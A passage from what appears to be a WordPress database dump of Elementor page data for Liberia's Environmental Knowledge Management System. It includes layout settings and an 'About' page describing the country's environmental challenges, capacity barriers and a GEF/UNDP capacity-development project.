later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ab9288a\",\"elType\":\"widget\",\"settings\":{\"number\":10,\"equal_height_cols\":\"true\",\"post_type\":\"page\",\"posts_query\":\"ids\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"18ceada\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c7672ae\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(4208,427,'_elementor_version','2.7.5'),(4209,427,'_elementor_template_type','wp-page'),(4213,428,'_wp_page_template','default'),(4214,428,'_elementor_edit_mode','builder'),(4215,428,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ab9288a\",\"elType\":\"widget\",\"settings\":{\"number\":10,\"equal_height_cols\":\"true\",\"post_type\":\"page\",\"posts_query\":\"ids\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"18ceada\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c7672ae\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(4216,428,'_elementor_version','2.7.5'),(4217,428,'_elementor_template_type','wp-page'),(4221,68,'ofc_enable_fullscreen','disable'),(4222,68,'ofc_fullscreen_nav','enable'),(4223,68,'ofc_fullscreen_nav_pos','right'),(4224,68,'osh_disable_topbar_sticky','default'),(4225,68,'osh_disable_header_sticky','default'),(4226,68,'osh_sticky_header_style','default'),(4227,68,'_elementor_edit_mode','builder'),(4228,68,'_elementor_template_type','wp-page'),(4229,68,'_elementor_version','3.6.6'),(4230,68,'_wp_page_template','default'),(4231,68,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\"}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key 